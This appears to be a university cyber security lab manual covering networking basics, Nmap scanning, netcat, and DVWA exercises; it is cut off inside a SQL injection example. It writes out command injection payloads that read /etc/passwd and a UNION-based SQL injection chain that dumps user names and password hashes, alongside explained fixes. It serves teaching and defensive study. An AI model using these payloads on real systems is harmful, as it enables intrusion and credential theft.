
Silver Oak College of Engineering & Technology

GUJARAT TECHNOLOGICAL UNIVERSITY


BACHELOR OF ENGINEERING

CYBER SECURITY
(3150714)

5th SEMESTER

COMPUTER ENGINEERING

Laboratory Manual

DEPARTMENT OF COMPUTER ENGINEERING
VISION

To be recognized for the quality education and research in the field of Computer Engineering known for
its accomplished graduates.

MISSION
1. Continually improve the standard of our graduates by engaging in innovative teaching learning
methods with high caliber motivated faculty members keeping in-line with the rapid
technological advancements.
2. Promote and support research activities over a wide range of academic interests among students
and staff for growth of individual knowledge and continuous learning.
3. Provide an education system that promotes innovation, creativity, entrepreneurial spirit,
leadership as well as freedom of thought with emphasis on professionalism and ethical behavior.

PROGRAM EDUCATIONAL OBJECTIVES (PEO):

PEO1: To provide fundamental knowledge of science and engineering for an IT professional and to
equip them with proficiency of mathematical foundations and algorithmic principles and inculcate
competent problem-solving ability.

PEO2: To implant ability in creativity & design of IT systems and transmit knowledge and skills
to analyze, design, test and implement various software applications.

PEO3: To exhibit leadership capability, triggering social and economic commitment, and inculcate
community service.

PEO4: To inculcate professional-social ethics, teamwork in students and acquaint them with requisite
technical and managerial skills to attain a successful career.
PROGRAM OUTCOMES (POs)
Engineering Graduates will be able to:

1. Engineering knowledge: Apply the knowledge of mathematics, science, engineering
fundamentals, and an engineering specialization to the solution of complex engineering
problems.
2. Problem analysis: Identify, formulate, review research literature, and analyze complex
engineering problems reaching substantiated conclusions using first principles of mathematics,
natural sciences, and engineering sciences.
3. Design/development of solutions: Design solutions for complex engineering problems and
design system components or processes that meet the specified needs with appropriate
consideration for the public health and safety, and the cultural, societal, and environmental
considerations.
4. Conduct investigations of complex problems: Use research-based knowledge and research
methods including design of experiments, analysis and interpretation of data, and synthesis of the
information to provide valid conclusions.
5. Modern tool usage: Create, select, and apply appropriate techniques, resources, and modern
engineering and IT tools including prediction and modeling to complex engineering activities
with an understanding of the limitations.
6. The engineer and society: Apply reasoning informed by the contextual knowledge to assess
societal, health, safety, legal and cultural issues and the consequent responsibilities relevant to
the professional engineering practice.
7. Environment and sustainability: Understand the impact of the professional engineering
solutions in societal and environmental contexts, and demonstrate the knowledge of, and need for
sustainable development.
8. Ethics: Apply ethical principles and commit to professional ethics and responsibilities and norms
of the engineering practice.
9. Individual and team work: Function effectively as an individual, and as a member or leader in
diverse teams, and in multidisciplinary settings.
10. Communication: Communicate effectively on complex engineering activities with the
engineering community and with society at large, such as, being able to comprehend and write
effective reports and design documentation, make effective presentations, and give and receive
clear instructions.
11. Project management and finance: Demonstrate knowledge and understanding of the
engineering and management principles and apply these to one’s own work, as a member and
leader in a team, to manage projects and in multidisciplinary environments.
12. Life-long learning: Recognize the need for, and have the preparation and ability to engage in
independent and life-long learning in the broadest context of technological change.
CYBER SECURITY PRACTICAL BOOK
DEPARTMENT OF COMPUTER ENGINEERING

PREFACE

It gives us immense pleasure to present the first edition of Cyber Security Practical Book for the
B.E. 3rd year students of Silver Oak College of Engineering and Technology.

The theory and laboratory course of Cyber Security, at Silver Oak College of Engineering and
Technology, Ahmedabad, is designed in such a manner that students can develop the basic
understanding of the subject during theory classes and gain the hands-on practical experience during
their laboratory sessions.

The Laboratory Manual presented here will help you understand network topologies, security-related
networking concepts, and the tools used for different attacks on security. It also takes you through
various hacking techniques, and introduces the Linux command line, which is indispensable in cyber
security work.

Lab Manual Revised by: Prof. Shital Mehta, Silver Oak College of Engineering and Technology

Prof. Nirav Shah, Silver Oak College of Engineering and Technology

Prof. Hardika Menghani, Aditya Silver Oak Institute of Technology

Lab Manual Revision No.: SOCET_3150714_LM_2020_1


TABLE OF CONTENTS

Sr. No.  Practical Aim                                             From   To
1        To study about Basic concepts of Computer Networks.        1      2
         (Devices, LAN, MAN & WAN)
2        To study about Network Topologies.                         3      9
3        TCP Scanning using NMAP.                                  10     13
4        UDP Port Scanning Using NMAP.                             14     16
5        TCP/UDP Connectivity using NETCAT.                        17     20
6        Web Application Testing using DVWA.                       21     27
7        SQL Injection using DVWA.                                 28     36
8        Analyze the Network Traffic using Wireshark.              37     40
9        The Practice of Web Application Penetration Testing.      41     54
10       Case Study on Indian IT ACT 2000.                         55     64
PRACTICAL: 1

AIM: To study about Basic concepts of Computer Networks. (Devices, LAN, MAN & WAN, OS)

Introduction

Local Area Network (LAN) –

A LAN, or Local Area Network, connects network devices in such a way that personal computers and
workstations can share data, tools and programs. The computers and devices are connected together by
a switch, or a stack of switches, and normally use a private IP address range (RFC 1918, for example
192.168.0.0/16). Private addresses are unique only within the local network; they are not routable on
the Internet. Routers are found at the boundary of a LAN, connecting it to the larger WAN.
Data is transmitted at a very fast rate, as the number of computers linked is limited. By definition,
the connections are high speed and use relatively inexpensive hardware (such as hubs, switches,
network adapters and Ethernet cables). LANs cover a small geographical area (size is limited to a few
kilometres) and are privately owned. One can use a LAN for an office building, home, hospital,
school, etc. A LAN is easy to design and maintain. The communication media used for a LAN are
twisted-pair and coaxial cables (and radio, for wireless LANs). It covers a short distance, so error
and noise are minimised.
Early LANs had data rates in the 4 to 16 Mbps range. Today, speeds are normally 100 or 1000 Mbps.
Propagation delay is very short in a LAN. The smallest LAN may use only two computers, while larger
LANs can accommodate thousands of computers. A LAN typically relies mostly on wired connections for
increased speed and security (a cable is harder to eavesdrop on than a radio link), but wireless
connections can also be part of a LAN. The fault tolerance of a LAN is high and there is less
congestion in this network. For example: a group of students playing Counter Strike in the same room
(without Internet).
Metropolitan Area Network (MAN) –

A MAN, or Metropolitan Area Network, covers a larger area than a LAN and a smaller area than a WAN.
It connects two or more computers that are apart but reside in the same city, or in different cities.
It covers a large geographical area and may be operated by an ISP (Internet Service Provider). A MAN is
designed for customers who need high-speed connectivity. Speeds of a MAN range in terms of Mbps. It is
hard to design and maintain a metropolitan area network.

The fault tolerance of a MAN is lower, and there is more congestion in the network. It is costly and
may or may not be owned by a single organization. The data transfer rate and the propagation delay of
a MAN are moderate. Devices used for transmission of data through a MAN are modems and wire/cable.
Examples of a MAN are the part of the telephone company network that can provide a high-speed DSL
line to the customer, or the cable TV network in a city.
Wide Area Network (WAN) –

A WAN, or Wide Area Network, is a computer network that extends over a large geographical area,
although it might be confined within the bounds of a state or country. A WAN could be a collection of
LANs connected to other LANs via telephone lines and radio waves, and may be limited to an enterprise
(a corporation or an organization) or accessible to the public. The technology is high speed and
relatively expensive.
There are two types of WAN: switched WAN and point-to-point WAN. A WAN is difficult to design and
maintain. Similar to a MAN, the fault tolerance of a WAN is lower and there is more congestion in the
network. Communication media used for a WAN are the PSTN or satellite links. Due to long-distance
transmission, noise and errors tend to be higher in a WAN. WAN traffic also crosses links that the
organization does not own or control, which is why it has to be protected (for example with a VPN)
rather than trusted the way LAN traffic often is.
A WAN's data rate is slow, about a tenth of a LAN's, since it involves increased distance and an
increased number of servers and terminals. Speeds of a WAN range from a few kilobits per second (Kbps)
to megabits per second (Mbps). Propagation delay is one of the biggest problems faced here. Devices
used for transmission of data through a WAN are optical fibre, microwaves and satellites. An example of
a switched WAN is an asynchronous transfer mode (ATM) network, and of a point-to-point WAN a dial-up
line that connects a home computer to the Internet.
Operating System (OS):
An operating system (OS) is basically a collection of software that manages computer hardware
resources and provides common services for computer programs. The operating system is a crucial
component of the system software in a computer system.
A network operating system is one of the important types of operating system.
A network operating system runs on a server and gives the server the capability to manage data, users,
groups, security, applications and other networking functions. The basic purpose of the network
operating system is to allow shared file and printer access among multiple computers in a network,
typically a local area network (LAN) or a private network, or to other networks.
Some examples of network operating systems include Microsoft Windows Server 2003, Microsoft
Windows Server 2008, UNIX, Linux, Mac OS X, Novell NetWare and BSD.

Advantages
● Centralized servers are highly stable.
● Security (user accounts, permissions and policy) is managed centrally on the server.
● New technologies and hardware can easily be integrated into the system.
● Servers can be accessed remotely from different locations and from different types of systems.

Disadvantages
● High cost of buying and running a server.
● Dependency on a central location for most operations.
● Regular maintenance and updates (including security patches) are required.
PRACTICAL: 2
AIM: To study about Network Topologies.
Network Topology
Computer network topology is the way the various components of a network (nodes, links,
peripherals, etc.) are arranged. Network topologies define the layout, virtual shape or structure of a
network, not only physically but also logically. The way in which different systems and nodes are
connected and communicate with each other is determined by the topology of the network. Topology can
be physical or logical.
Physical topology is the physical layout of nodes, workstations and cables in the network, while
logical topology is the way information flows between the different components.

Types of Physical Network Topologies:

● Bus Topology
● Star Topology
● Ring Topology
● Mesh Topology
● Tree Topology

1. Bus Topology

Bus topology is the simplest of network topologies. In this type of topology, all the nodes (computers as
well as servers) are connected to a single cable (called the bus) with the help of interface connectors.
This central cable is the backbone of the network and is known as the bus (hence the name). Every
workstation communicates with the other devices through this bus.

A signal from the source is broadcast and travels to all workstations connected to the bus cable.
Although the message is broadcast, only the intended recipient, whose MAC address or IP address
matches, accepts it. If the MAC/IP address of a machine does not match the intended address, the
machine discards the signal. Note that "discards" is a decision made by the receiving network
interface: any node on the bus can be put into promiscuous mode and read every frame, which is why a
shared medium offers no confidentiality.
A terminator is added at each end of the central cable to prevent bouncing of signals. A barrel
connector can be used to extend it. Below is a basic diagram of a bus topology, followed by the
advantages and disadvantages of bus network topology.

Advantages of Bus Topology

● Easy to connect a computer or peripheral to a linear bus.
● Requires less cable length than a star topology.

Disadvantages of Bus Topology

● The entire network shuts down if there is a break in the main cable.
● Terminators are required at both ends of the backbone cable.
● Difficult to identify the problem if the entire network shuts down.
● Not meant to be used as a stand-alone solution.
2. Star Topology

In star topology, all the components of the network are connected to a central device, conventionally
called the "hub", which may be an actual hub, a router or a switch. Unlike bus topology (discussed
earlier), where nodes were connected to a central cable, here all the workstations are connected to the
central device with a point-to-point connection. So it can be said that every computer is indirectly
connected to every other node via the "hub".
All the data on the star topology passes through the central device before reaching the intended
destination. The hub acts as a junction connecting the different nodes present in the star network, and
at the same time it manages and controls the whole network. Depending on which central device is used,
the "hub" can act as a repeater or signal booster. The central device can also communicate with the hubs
of other networks. Whether other stations can see your traffic depends on the device: a hub repeats every
frame to every port, while a switch forwards a frame only to the port of its destination MAC address.
Unshielded Twisted Pair (UTP) Ethernet cable is used to connect workstations to the central node.

Advantages of Star Topology:

● Less damage in case of a single computer failure, as it does not affect the entire network.

Disadvantages of Star topology:

● More cable is required, because each computer individually connects to the central device.
● The central device is a single point of failure: if it goes down, the whole network goes down.
3. Ring Topology

In ring topology, all the nodes are connected to each other in such a way that they make a closed
loop. Each workstation is connected to the two components on either side of it, and it communicates
with these two adjacent neighbours. Data travels around the network in one direction. Sending and
receiving of data takes place with the help of a TOKEN.
Token passing (in brief): the token is a small frame that carries the right to transmit. A node holding
a free token attaches its data and the destination address to it and sends it to the next node. Each
node that receives it checks whether the frame is intended for it; if yes, it takes the data and
releases an empty token back onto the ring, otherwise it passes the token along with the data to the
next node. This process continues until the frame reaches its intended destination. Only the node
holding the token is allowed to send data; the other nodes have to wait for an empty token to reach
them. This network is usually found in offices, schools and small buildings.

Advantages of Ring topology:

● Reduced chance of data collision, as each node releases a data packet only after receiving the token.
● Token passing makes ring topology perform better than bus topology under heavy traffic.
● No need for a server to control connectivity among the nodes.
● Equal access to the resources.

Disadvantages of Ring topology:

● In a unidirectional ring, a data packet may have to pass through all the nodes.
Example: let A, B, C, D and E be part of the ring network, with data flowing from A towards B and
so on. If E wants to send a packet to D, the packet must traverse the entire ring, passing through
every other node, to reach it.
● Single point of failure: if a node goes down, the entire network goes down.

4. Mesh Topology
In a mesh network topology, each of the network nodes (computers and other devices) is
interconnected with the others. Every node not only sends its own signals but also relays data from
other nodes. In fact a true mesh topology is one where every node is connected to every other node in
the network. This type of topology is very expensive, as there are many redundant connections, so it
is not much used in wired computer networks. It is commonly used in wireless networks. Flooding or
routing techniques are used to deliver data in a mesh topology.

Types of Mesh Network topologies:

a. Full Mesh Topology: here, like a true mesh, each component is connected to every other component,
so n nodes need n(n-1)/2 links. Even after considering the redundancy factor and cost of this network,
its main advantage is that the network traffic can be redirected to other nodes if one of the nodes
goes down. Full mesh topology is used only for backbone networks.

b. Partial Mesh Topology: this is far more practical as compared to full mesh topology. Here some of
the systems are connected in the same fashion as in a full mesh, while the rest of the systems are only
connected to one or two devices. It can be said that in a partial mesh the workstations are indirectly
connected to other devices. This one is less costly and also reduces redundancy.

Advantages of mesh topology:

● Each connection can carry its own data load.
● It is robust.
● A fault is diagnosed easily.
● Provides security and privacy, since a point-to-point link carries only the traffic of its two endpoints.

Disadvantages of mesh topology:

● Installation and configuration are difficult as the number of connections grows.
● Cabling cost is high, and highest in the case of a fully connected mesh topology.
● Bulk wiring is required.

5. Tree Topology

Tree topology integrates the characteristics of star and bus topology. Earlier we saw how in physical
star network topology computers (nodes) are connected to each other through a central hub.

In tree topology, a number of star networks are connected using a bus. This main cable looks like the
main stem of a tree, and the other star networks are the branches. It is also called expanded star
topology. The Ethernet protocol is commonly used in this type of topology. The diagram below will make
it clear.

Advantages of tree topology:

● Scalable, as leaf nodes can accommodate more nodes in the hierarchical chain.
● Each intermediate hub is wired point-to-point to its own stations, and the hubs themselves act as
the nodes of the bus.
● Other hierarchical networks are not affected if one of them gets damaged.
● Easier maintenance and fault finding.

Disadvantages of tree topology:

● A lot of cabling is needed.
● A lot of maintenance is needed.
● The backbone forms a single point of failure.

6. Hybrid Topology

Hybrid, as the name suggests, is a mixture of two different things. Similarly, in this type of topology
we integrate two or more different topologies to form a resultant topology that combines their good
points while optimising the available resources. Special care can be given to nodes where traffic is
high as well as where the chance of a fault is high.
PRACTICAL: 3

AIM: TCP Scanning using NMAP.

Nmap is a port scanner: it probes a target host to discover which TCP (and UDP) ports are open, and
reports each port as open, closed or filtered. Only scan hosts you own or have written permission to
scan; the lab machines are the target here.
Step 1: Install Nmap (the Windows installer also installs the Zenmap GUI used in the steps below).
Step 2: Start Nmap (Zenmap).
Following is the GUI of Nmap.

Put Screenshot of Nmap Home Screen:

Step 3: Set the IP address of the target in the Target field.

Step 4: Choose the scan type. The command-line equivalent of a TCP connect scan is
nmap -sT <target>. The SYN (half-open) scan, nmap -sS, sends the SYN by hand and never completes the
handshake; it is Nmap's default when run with administrator privileges, which it needs for raw sockets.
Put Screenshot of Choose the scan:
Step 5: Click Scan.
Result Analysis
Nmap Output
Screenshot:
Ports: for each port note its state: open (a service accepted the connection), closed (the host
answered with RST, nothing is listening) or filtered (no answer at all, usually a firewall dropping
the probe).

Host Details:
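What the "TCP connect scan" does on the wire, as an added example that is not part of Nmap or of this manual: a minimal connect() scanner in Python. The listener it scans is one it starts itself on 127.0.0.1 (an assumption made so the example runs offline); to use it against a lab host, call tcp_connect_scan() with that host and a port range.

```python
"""TCP connect() scanner: the probe behind Nmap's -sT scan.

Added example for this lab manual; it is not Nmap's code or the manual's own.
A full three-way handshake is completed on every port, which is why this scan
needs no raw-socket privileges, and also why it is the noisiest kind: every
open port records a completed connection in the target's logs.
"""
import socket
import threading


def tcp_connect_scan(host, ports, timeout=1.0):
    """Return {port: state}, state being 'open', 'closed' or 'filtered'.

    open     -> handshake completed (a service accepted)
    closed   -> the host answered with RST (nothing listening)
    filtered -> no answer before the timeout, typically a firewall dropping
                the SYN; this is the one case Nmap cannot decide either.
    """
    results = {}
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            try:
                s.connect((host, port))
                results[port] = "open"
            except ConnectionRefusedError:
                results[port] = "closed"
            except OSError:              # includes socket.timeout
                results[port] = "filtered"
    return results


def demo_scan():
    """Scan a listener started here on 127.0.0.1, so the run is offline.

    Returns (results, open_port, closed_port): one port with a live listener,
    one that was bound and released so it is known to be free.
    """
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))       # port 0: the kernel picks a free port
    listener.listen(5)
    open_port = listener.getsockname()[1]

    spare = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    spare.bind(("127.0.0.1", 0))
    closed_port = spare.getsockname()[1]
    spare.close()                         # nothing listens here any more

    def serve():                          # accept and drop, like a quiet service
        try:
            while True:
                conn, _ = listener.accept()
                conn.close()
        except OSError:
            pass                          # listener closed: stop

    threading.Thread(target=serve, daemon=True).start()
    try:
        results = tcp_connect_scan("127.0.0.1", [open_port, closed_port])
    finally:
        listener.close()
    return results, open_port, closed_port


if __name__ == "__main__":
    res, op, cp = demo_scan()
    for port in sorted(res):
        print(f"{port}/tcp\t{res[port]}")
```

The "filtered" branch is the one to watch in the lab: a port that times out is not proven closed, and the scan only gets slower with each such port, which is exactly why Nmap reports it as a separate state.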
PRACTICAL: 4

AIM: UDP Port Scanning Using NMAP.

UDP has no handshake, so a UDP scan (nmap -sU <target>) sends a datagram to each port and
classifies the port by what comes back: an ICMP port unreachable message means closed, an
application reply means open, and silence means open|filtered, because a listening service that
ignores the probe is indistinguishable from a firewall dropping it. Hosts rate-limit ICMP errors, so
a UDP scan is much slower than a TCP scan.

Step 1: Install Nmap (the Windows installer also installs the Zenmap GUI).

Step 2: Start Nmap (Zenmap).
Following is the GUI of Nmap.
Put Screenshot of Nmap Home Screen:

Step 3: Set the IP address of the target.

Step 4: Choose the scan type (UDP scan).
Put Screenshot of Choose the scan:

Step 5: Click Scan.

Result Analysis
Nmap Output:
Ports: note which ports are reported closed, open, and open|filtered, and how much longer the scan
took than the TCP scan of Practical 3.
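The decision rule above as a runnable probe, added here as an example (it is not Nmap's code or this manual's). The UDP echo service it scans is started by the example itself on 127.0.0.1 (an assumption so the run is offline); the "closed" verdict relies on the operating system delivering the ICMP port unreachable error to a connected UDP socket, which Linux does.

```python
"""UDP port probe with the decision rule Nmap's -sU scan uses.

Added example for this lab manual, not code from Nmap or the manual. UDP has
no handshake, so the scanner can only infer state from what comes back:
  - an application reply        -> open
  - ICMP port unreachable       -> closed  (seen as ECONNREFUSED on a
                                            connected UDP socket)
  - silence before the timeout  -> open|filtered (Nmap's wording)
The third outcome is why UDP scans are slow and ambiguous: a listening service
that does not answer an empty datagram looks identical to a firewall drop.
"""
import socket
import threading


def udp_probe(host, port, payload=b"", timeout=1.0):
    """Return 'open', 'closed' or 'open|filtered' for one UDP port."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        # connect() on a UDP socket sends nothing; it makes the kernel hand
        # ICMP errors for this destination to us as ConnectionRefusedError.
        s.connect((host, port))
        try:
            s.send(payload)
            s.recv(4096)
            return "open"
        except ConnectionRefusedError:
            return "closed"
        except socket.timeout:
            return "open|filtered"


def udp_scan(host, ports, timeout=1.0):
    """Probe each port in turn; Nmap sends protocol-specific payloads for
    well-known ports (DNS, SNMP, ...) to coax a reply, this sends an empty one."""
    return {p: udp_probe(host, p, timeout=timeout) for p in ports}


def demo_scan():
    """Start a UDP echo service on 127.0.0.1 and scan it plus a free port.

    Returns (results, echo_port, free_port). The echo service answers every
    datagram, so its port must come out 'open'; nothing is bound on the free
    port, so the kernel answers with ICMP port unreachable -> 'closed'.
    """
    echo = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    echo.bind(("127.0.0.1", 0))
    echo_port = echo.getsockname()[1]

    spare = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    spare.bind(("127.0.0.1", 0))
    free_port = spare.getsockname()[1]
    spare.close()

    def serve():
        try:
            while True:
                data, peer = echo.recvfrom(4096)
                echo.sendto(b"echo:" + data, peer)
        except OSError:
            pass                          # socket closed: stop

    threading.Thread(target=serve, daemon=True).start()
    try:
        results = udp_scan("127.0.0.1", [echo_port, free_port])
    finally:
        echo.close()
    return results, echo_port, free_port


if __name__ == "__main__":
    res, ep, fp = demo_scan()
    for port in sorted(res):
        print(f"{port}/udp\t{res[port]}")
```

Raise the timeout when scanning across the lab network: a slow host or a busy switch turns genuine "closed" ports into "open|filtered" and the scan then reports far more candidates than really exist.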
PRACTICAL: 5

AIM: TCP/UDP Connectivity using NETCAT.

netcat = net + cat.

It is the cat command over the network: it copies standard input to a TCP or UDP connection and the
connection to standard output, so it can act as a client, as a listener, or as a file-transfer tool.
Learn the basic Unix/Linux commands to understand the working of this tool.

Step 1: Install ncat. It is shipped with the Nmap package, so check whether it is already present
before installing a fresh package.

Step 2: Start ncat by going to the ncat folder in cmd.

To show a TCP connection we need to maintain a client-server session.

Step 3: Open two 'cmd' windows in administrator mode.

Step 4: Go to the folder where ncat.exe is installed (in both windows).
Step 5: Run the command: ncat.exe -l 4444
Here -l sets ncat to listen on port number 4444.

Step 6: In the second cmd window (the client) run the command: ncat.exe 127.0.0.1 4444

127.0.0.1 is the loopback address, i.e. the same PC, and 4444 is the port number on which ncat is
listening. To practise in the lab, enter your neighbour's IP address instead, and choose any port
number greater than 1024 (on Unix-like systems, binding a port below 1024 requires root).

Step 7: Now type the message to be sent to the server. As soon as you press Enter, the message is
sent to the server and displayed in the server's cmd window. Everything goes over the wire in plain
text: anyone sniffing the lab network (see Practical 8) can read it, and anyone who can reach the port
can connect to the listener, since ncat performs no authentication.
Step 8: The connection is now established. To disconnect, press Ctrl+C.

Step 9: To transfer a file, type on the server side:

ncat.exe -l 4444 > input.txt

and in the client window:

ncat.exe 127.0.0.1 4444 < output.txt

The client sends the contents of output.txt; the server writes everything it receives into input.txt
and exits when the client closes the connection. To do the same over UDP instead of TCP, add -u to
both commands.
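What the two commands in Step 9 do, as an added example that is not ncat's code or this manual's: one side listens and copies the stream to a buffer until the client closes its end, the other connects, sends and closes. The port and the sample payload are chosen by the example itself (assumptions, so it runs on 127.0.0.1 without a second machine).

```python
"""`ncat -l PORT > file` and `ncat HOST PORT < file`, in Python.

Added example for this lab manual; it is not ncat's code. One side listens,
the other connects; whatever the client writes is streamed to the listener
until the client closes its end (the EOF that `< file` produces), at which
point the listener's recv() returns b"" and it stops. Nothing is encrypted
and nothing authenticates either side: anyone who can reach the port can
connect and send, which is the caveat to keep in mind on a shared lab network.
"""
import io
import socket
import threading


def receive_stream(listener, sink):
    """Server half (`ncat -l PORT > file`): accept one client, copy until EOF."""
    conn, _peer = listener.accept()
    with conn:
        while True:
            chunk = conn.recv(4096)
            if not chunk:                 # client closed its side: our EOF
                break
            sink.write(chunk)


def send_stream(host, port, data):
    """Client half (`ncat HOST PORT < file`): connect, send all, half-close."""
    with socket.create_connection((host, port)) as s:
        s.sendall(data)
        s.shutdown(socket.SHUT_WR)        # "no more data": lets the server finish


def transfer(data, host="127.0.0.1"):
    """Run both halves on localhost; return the bytes the server received."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind((host, 0))              # port 0: kernel picks a free port
    listener.listen(1)
    port = listener.getsockname()[1]
    sink = io.BytesIO()

    server = threading.Thread(target=receive_stream, args=(listener, sink))
    server.start()
    send_stream(host, port, data)
    server.join(timeout=5)
    listener.close()
    return sink.getvalue()


if __name__ == "__main__":
    # Constructed sample payload standing in for output.txt.
    sample = b"hello from the client\n" * 1000
    got = transfer(sample)
    print(f"received {len(got)} bytes, intact={got == sample}")
```

The shutdown(SHUT_WR) is the detail that makes file transfer work: the client can only signal "that was the whole file" by closing its sending direction, and the listener can only detect it as an empty recv(). A listener that never sees that EOF waits forever, which is what happens in the lab when a client is killed from the wrong window.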


PRACTICAL: 6

AIM: Web Application Testing using DVWA.

Step 1: Install the DVWA (Damn Vulnerable Web Application) tool.

Step 2: Log in to DVWA.

Step 3: Set the DVWA security level:

1. Click on DVWA Security in the left-hand menu.

2. Select "low".

3. Click Submit.
Step 4: Command Execution.

1. Click on Command Execution.

Step 5: Execute Ping

1. Below we are going to do a simple ping test using the web interface.
2. As an example, ping something on your network.
3. Use the IP address 192.168.1.106.
4. Click Submit.
Attempt 1

1. 192.168.1.106; cat /etc/passwd

2. Click Submit.
3. Notice that we are now able to see the contents of the /etc/passwd file: the page appended our
input to a shell command, and the shell treated ";" as the end of the ping command and the start of
a new one.
Step 6: Bring up a terminal window.

1. cat /var/www/html/dvwa/vulnerabilities/exec/source/low.php (the path depends on where DVWA is
installed).
2. Notice the two shell_exec lines.
3. These are the lines that execute ping, depending on which operating system is being used.
4. In a Unix/Linux shell you can run multiple commands separated by ";".
5. Notice that the code does not check at all whether $target is an IP address.
6. A pattern such as \d+\.\d+\.\d+\.\d+ (where "\d+" is one or more digits, as in 192.168.1.106)
would describe an address, but only if the dots are escaped and the match is anchored to the whole
string: an unanchored match still accepts "192.168.1.106; cat /etc/passwd", because the address is
a valid prefix of it. The robust fix is to validate the input as an IP address and pass it to ping as
a single argument without going through a shell.
7. Because there is no such check, an attacker can append commands behind the IP address:
8. 192.168.1.106; cat /etc/passwd
Step 7: Copy the /etc/passwd file to /tmp:

192.168.1.106; cat /etc/passwd | tee /tmp/passwd
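The vulnerable pattern from low.php and its hardened form, added here as an example in Python (it is not DVWA's PHP). It also shows why the unescaped, unanchored regex from Step 6 does not help. The only assumptions are the helper names and that ping takes -c on this system; nothing is executed unless run_safe_ping() is called.

```python
"""DVWA 'Command Execution' reproduced and hardened in Python.

Added example for this lab manual; it is not DVWA's PHP. The vulnerable
builder does what low.php does: glue the user's text onto a shell command
string, so ';' ends the ping and starts a second command. The naive regex is
the manual's \\d+.\\d+.\\d+.\\d+ used with match(): unescaped dots and no end
anchor, so the injected string still passes. The hardened path validates the
value as an IP address and passes argv as a list with no shell in between.
"""
import ipaddress
import re
import shlex
import subprocess

PAYLOAD = "192.168.1.106; cat /etc/passwd"     # the manual's "Attempt 1"


def vulnerable_ping_line(target):
    """The command line low.php hands to the shell (returned, not executed)."""
    return "ping -c 1 " + target               # shell_exec('ping -c 1 ' . $target)


def shell_words(line):
    """Tokenise like a POSIX shell so the ';' separator becomes visible."""
    lexer = shlex.shlex(line, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    return list(lexer)


def naive_looks_like_ip(target):
    r"""The check as often written: \d+.\d+.\d+.\d+ with re.match().

    '.' matches any character and match() anchors only the start, so the
    payload is accepted: its first 13 characters look like an address.
    """
    return re.match(r"\d+.\d+.\d+.\d+", target) is not None


def is_valid_ip(target):
    """Strict: the whole string must parse as an IPv4 or IPv6 address."""
    try:
        ipaddress.ip_address(target)
        return True
    except ValueError:
        return False


def safe_ping_argv(target):
    """Hardened builder: validate, then return argv for shell=False."""
    if not is_valid_ip(target):
        raise ValueError(f"not an IP address: {target!r}")
    # One argv element per token: ';', '|', '&&' would reach ping literally,
    # and cannot get this far anyway after validation.
    return ["ping", "-c", "1", target]


def accepted_by_hardened(target):
    """True if the hardened builder would run ping for this input."""
    try:
        safe_ping_argv(target)
        return True
    except ValueError:
        return False


def run_safe_ping(target, timeout=10):
    """Execute the hardened form; returns the process exit code."""
    return subprocess.run(safe_ping_argv(target), capture_output=True,
                          timeout=timeout).returncode


if __name__ == "__main__":
    print("shell sees :", shell_words(vulnerable_ping_line(PAYLOAD)))
    print("naive regex:", naive_looks_like_ip(PAYLOAD))   # bypassed
    print("strict     :", is_valid_ip(PAYLOAD))           # rejected
    print("hardened   :", accepted_by_hardened(PAYLOAD))  # rejected
```

Validation alone is not the fix; passing a list with shell=False is. With a shell in the path, every metacharacter the regex forgot (newline, backtick, $(...)) is a new bypass, whereas an argv element is delivered to ping as data no matter what it contains.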


PRACTICAL: 7

AIM: Manual SQL Injection using DVWA

Step 1: Install the DVWA tool.

Step 2: Log in to DVWA.

Step 3: Select the security level "low".

Step 4: Select "SQL Injection" from the left navigation menu.
Step 5:

● Input the below text into the User ID textbox (see picture):
● %' or '0'='0 and click Submit.
● The query becomes ... WHERE user_id = '%' or '0'='0'. We are asking for all records that are
false OR all records that are true, i.e. every record.
● %' - will probably not equal any user_id, and so is false.
● '0'='0' - is always true, because 0 always equals 0.
Step 6:
● Input the below text into the User ID textbox (see picture):
● %' or 0=0 union select null, version() #
● The UNION appends a row of our own to the result; its second column is displayed where the surname
normally appears. Notice in the last displayed line that a version such as 5.1.60 (whatever your
server runs) is displayed in the surname.
● This is the version of the MySQL database. The # comments out the rest of the original query,
including its closing quote.
Step 7: Display Database User
● Input the below text into the User ID textbox (see picture):
● %' or 0=0 union select null, user() #
● Notice in the last displayed line, root@localhost is displayed in the surname.
● This is the database user the PHP code connects as. A web application connecting as root is itself
a finding: it should use an account with only the privileges it needs.
Step 8: Display all tables in information_schema
● Input the below text into the User ID textbox (see picture):
● %' and 1=0 union select null, table_name from information_schema.tables #
● Click Submit.
● Now we are displaying all the tables in the information_schema database. The 1=0 empties the
genuine result so only our UNION rows are shown.
● INFORMATION_SCHEMA is the information database, the place that stores information about all the
other databases that the MySQL server maintains.
Step 9: Display all the user tables in information_schema
● Input the below text into the User ID textbox (see picture):
● %' and 1=0 union select null, table_name from information_schema.tables where table_name
like 'user%' #
● Click Submit.
● Now we are displaying all the tables whose name starts with the prefix "user".

Step 10: Display all the columns of the users table
● Input the below text into the User ID textbox (see picture):
● %' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns
where table_name = 'users' #
● Click Submit.

● Now we are displaying all the columns in the users table (0x0a is a newline, used to separate
the two values).

● Notice there are user_id, first_name, last_name, user and password columns.
Step 11: Display the contents of those columns in the dvwa users table
● Input the below text into the User ID textbox (see picture):
● %' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from
users #
● Click Submit.
● Now we have displayed all the authentication information (user names and password hashes) held in
this database.
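The same chain of payloads run against a small local database, added here as an example (not DVWA's code; the table rows are constructed, not DVWA's real users). It uses Python's bundled SQLite instead of MySQL, so three things differ from the payloads typed into DVWA: the comment marker is -- rather than #, version() is sqlite_version(), and information_schema.tables/columns become sqlite_master/pragma_table_info. The query shape is DVWA's, and the parameterised lookup shows why the injection then stops working.

```python
"""DVWA's SQL Injection exercise against an in-memory SQLite database.

Added example for this lab manual, not DVWA's code. The table and rows are
constructed here (DVWA's real data is not reproduced); the query shape is the
one DVWA's low-security page uses:
    SELECT first_name, last_name FROM users WHERE user_id = '$id'
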